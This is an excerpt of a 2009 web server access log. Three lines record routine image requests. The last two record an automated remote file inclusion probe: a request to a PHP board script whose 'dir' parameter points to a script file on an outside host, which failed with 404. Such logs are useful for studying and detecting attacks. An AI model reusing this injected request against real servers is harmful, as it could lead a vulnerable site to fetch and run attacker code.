64.221.88.162 - - [23/Sep/2009:07:16:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
64.221.88.162 - - [23/Sep/2009:07:16:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
64.221.88.162 - - [23/Sep/2009:07:16:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; FunWebProducts; .NET CLR 1.1.4322)"
210.115.58.73 - - [23/Sep/2009:07:16:25 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
210.115.58.73 - - [23/Sep/2009:07:16:31 -0400] "GET /logs/access_log.Q109072500///skin/ggambo7002_board/comment_modify.php?dir=http://www.zipclube.com/loja//administrator/idoisir.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
